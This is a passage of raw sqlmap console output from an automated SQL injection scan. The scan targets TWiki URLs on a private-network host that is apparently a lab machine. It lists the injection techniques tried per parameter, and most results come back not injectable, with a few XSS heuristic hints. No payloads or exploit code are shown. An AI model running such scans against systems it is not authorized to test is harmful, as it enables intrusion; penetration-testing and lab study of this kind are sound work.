[19:49:33] [INFO] testing 'Oracle AND time-based blind' | |
[19:49:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:49:34] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:49:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:49:45] [WARNING] URI parameter '#1*' is not injectable | |
[19:49:45] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 136: | |
GET http://192.168.1.113/twiki/bin/search/Main/SearchResult?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:49:45] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/SearchResult?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:49:45] [INFO] testing connection to the target URL | |
[19:49:46] [INFO] testing if the target URL is stable | |
[19:49:47] [INFO] target URL is stable | |
[19:49:47] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:49:47] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:49:47] [INFO] URI parameter '#1*' is dynamic | |
[19:49:47] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:49:47] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:49:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:49:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:49:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:49:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:49:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:49:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:49:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:49:51] [INFO] testing 'MySQL inline queries' | |
[19:49:51] [INFO] testing 'PostgreSQL inline queries' | |
[19:49:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:49:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:49:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:49:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:49:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:49:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:49:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:49:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:49:54] [INFO] testing 'Oracle AND time-based blind' | |
[19:49:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:49:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:50:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:50:07] [WARNING] URI parameter '#1*' is not injectable | |
[19:50:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 137: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebChanges?t=1441457480 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:50:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebChanges?t=1441457480' | |
[19:50:07] [INFO] testing connection to the target URL | |
[19:50:07] [INFO] testing if the target URL is stable | |
[19:50:08] [INFO] target URL is stable | |
[19:50:08] [INFO] testing if GET parameter 't' is dynamic | |
[19:50:08] [WARNING] GET parameter 't' does not appear dynamic | |
[19:50:08] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:50:08] [INFO] testing for SQL injection on GET parameter 't' | |
[19:50:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:50:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:50:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:50:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:50:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:50:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:50:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:50:11] [INFO] testing 'MySQL inline queries' | |
[19:50:11] [INFO] testing 'PostgreSQL inline queries' | |
[19:50:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:50:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:50:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:50:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:50:13] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:50:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:50:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:50:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:50:14] [INFO] testing 'Oracle AND time-based blind' | |
[19:50:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:50:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:50:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:50:26] [WARNING] GET parameter 't' is not injectable | |
[19:50:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 138: | |
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Changes[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:50:26] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Changes[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:50:26] [INFO] testing connection to the target URL | |
[19:50:26] [INFO] testing if the target URL is stable | |
[19:50:27] [INFO] target URL is stable | |
[19:50:27] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:50:27] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:50:27] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:50:27] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:50:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:50:28] [WARNING] reflective value(s) found and filtering out | |
[19:50:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:50:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:50:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:50:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:50:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:50:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:50:31] [INFO] testing 'MySQL inline queries' | |
[19:50:31] [INFO] testing 'PostgreSQL inline queries' | |
[19:50:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:50:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:50:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:50:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:50:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:50:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:50:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:50:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:50:34] [INFO] testing 'Oracle AND time-based blind' | |
[19:50:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:50:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:50:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:50:47] [WARNING] URI parameter '#1*' is not injectable | |
[19:50:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 139: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:50:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?skin=print' | |
[19:50:47] [INFO] testing connection to the target URL | |
[19:50:48] [INFO] testing if the target URL is stable | |
[19:50:48] [INFO] target URL is stable | |
[19:50:48] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:50:48] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:50:49] [INFO] GET parameter 'skin' is dynamic | |
[19:50:49] [INFO] heuristics detected web page charset 'ascii' | |
[19:50:49] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:50:49] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:50:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:50:49] [WARNING] reflective value(s) found and filtering out | |
[19:50:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:50:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:50:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:50:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:50:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:50:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:50:54] [INFO] testing 'MySQL inline queries' | |
[19:50:55] [INFO] testing 'PostgreSQL inline queries' | |
[19:50:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:50:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:50:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:50:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:50:57] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:50:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:50:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:50:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:51:00] [INFO] testing 'Oracle AND time-based blind' | |
[19:51:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:51:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:51:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:51:18] [WARNING] GET parameter 'skin' is not injectable | |
[19:51:18] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 140: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebChanges?rev1=1.3&rev2=1.2 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:51:18] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebChanges?rev1=1.3&rev2=1.2' | |
[19:51:18] [INFO] testing connection to the target URL | |
[19:51:19] [INFO] testing if the target URL is stable | |
[19:51:20] [INFO] target URL is stable | |
[19:51:20] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:51:20] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:51:20] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:51:20] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:51:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:51:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:51:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:51:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:51:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:51:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:51:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:51:26] [INFO] testing 'MySQL inline queries' | |
[19:51:27] [INFO] testing 'PostgreSQL inline queries' | |
[19:51:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:51:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:51:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:51:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:51:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:51:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:51:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:51:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:51:33] [INFO] testing 'Oracle AND time-based blind' | |
[19:51:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:51:34] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:51:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:51:58] [WARNING] GET parameter 'rev1' is not injectable | |
[19:51:58] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:51:59] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[19:51:59] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:51:59] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:51:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:52:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:52:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:52:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:52:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:52:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:52:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:52:06] [INFO] testing 'MySQL inline queries' | |
[19:52:06] [INFO] testing 'PostgreSQL inline queries' | |
[19:52:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:52:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:52:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:52:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:52:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:52:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:52:11] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:52:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:52:13] [INFO] testing 'Oracle AND time-based blind' | |
[19:52:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:52:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:52:38] [WARNING] GET parameter 'rev2' is not injectable | |
[19:52:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 141: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?rev=1.2 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:52:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?rev=1.2' | |
[19:52:38] [INFO] testing connection to the target URL | |
[19:52:39] [INFO] testing if the target URL is stable | |
[19:52:40] [INFO] target URL is stable | |
[19:52:40] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:52:40] [WARNING] GET parameter 'rev' does not appear dynamic | |
[19:52:40] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:52:40] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:52:40] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:52:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:52:40] [WARNING] reflective value(s) found and filtering out | |
[19:52:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:52:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:52:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:52:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:52:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:52:45] [INFO] testing 'MySQL inline queries' | |
[19:52:45] [INFO] testing 'PostgreSQL inline queries' | |
[19:52:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:52:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:52:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:52:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:52:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:52:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:52:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:52:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:52:49] [INFO] testing 'Oracle AND time-based blind' | |
[19:52:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:52:49] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:52:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:53:06] [WARNING] GET parameter 'rev' is not injectable | |
[19:53:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:53:06] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebChanges?rev1=1.2&rev2=1.1' | |
[19:53:06] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?rev=1.1' | |
URL 142: | |
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebChanges?template=oopsmore¶m1=1.3¶m2=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:53:06] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebChanges?template=oopsmore¶m1=1.3¶m2=1.3' | |
[19:53:06] [INFO] testing connection to the target URL | |
[19:53:06] [INFO] testing if the target URL is stable | |
[19:53:07] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:53:07] [INFO] testing if GET parameter 'template' is dynamic | |
[19:53:07] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:53:07] [INFO] GET parameter 'template' is dynamic | |
[19:53:07] [INFO] heuristics detected web page charset 'ascii' | |
[19:53:07] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:53:07] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:53:07] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:53:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:53:07] [WARNING] reflective value(s) found and filtering out | |
[19:53:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:53:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:53:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:53:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:53:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:53:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:53:10] [INFO] testing 'MySQL inline queries' | |
[19:53:10] [INFO] testing 'PostgreSQL inline queries' | |
[19:53:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:53:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:53:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:53:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:53:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:53:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:53:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:53:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:53:13] [INFO] testing 'Oracle AND time-based blind' | |
[19:53:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:53:13] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:53:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:53:22] [WARNING] GET parameter 'template' is not injectable | |
[19:53:22] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:53:22] [WARNING] GET parameter 'param1' does not appear dynamic | |
[19:53:23] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:53:23] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:53:23] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:53:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:53:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:53:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:53:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:53:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:53:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:53:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:53:26] [INFO] testing 'MySQL inline queries' | |
[19:53:26] [INFO] testing 'PostgreSQL inline queries' | |
[19:53:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:53:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:53:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:53:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:53:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:53:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:53:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:53:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:53:30] [INFO] testing 'Oracle AND time-based blind' | |
[19:53:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:53:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:53:43] [WARNING] GET parameter 'param1' is not injectable | |
[19:53:43] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:53:43] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:53:43] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:53:43] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:53:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:53:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:53:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:53:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:53:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:53:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:53:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:53:47] [INFO] testing 'MySQL inline queries' | |
[19:53:47] [INFO] testing 'PostgreSQL inline queries' | |
[19:53:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:53:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:53:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:53:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:53:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:53:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:53:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:53:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:53:50] [INFO] testing 'Oracle AND time-based blind' | |
[19:53:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:53:54] [INFO] target URL appears to be UNION injectable with 10 columns | |
[19:53:54] [WARNING] applying generic concatenation with double pipes ('||') | |
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y | |
[19:53:58] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') | |
[19:54:01] [INFO] testing 'MySQL UNION query (58) - 1 to 10 columns' | |
[19:54:07] [WARNING] GET parameter 'param2' is not injectable | |
[19:54:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 143: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/StartingPoints?t=1441457517 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:54:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/StartingPoints?t=1441457517' | |
[19:54:07] [INFO] testing connection to the target URL | |
[19:54:07] [INFO] testing if the target URL is stable | |
[19:54:08] [INFO] target URL is stable | |
[19:54:08] [INFO] testing if GET parameter 't' is dynamic | |
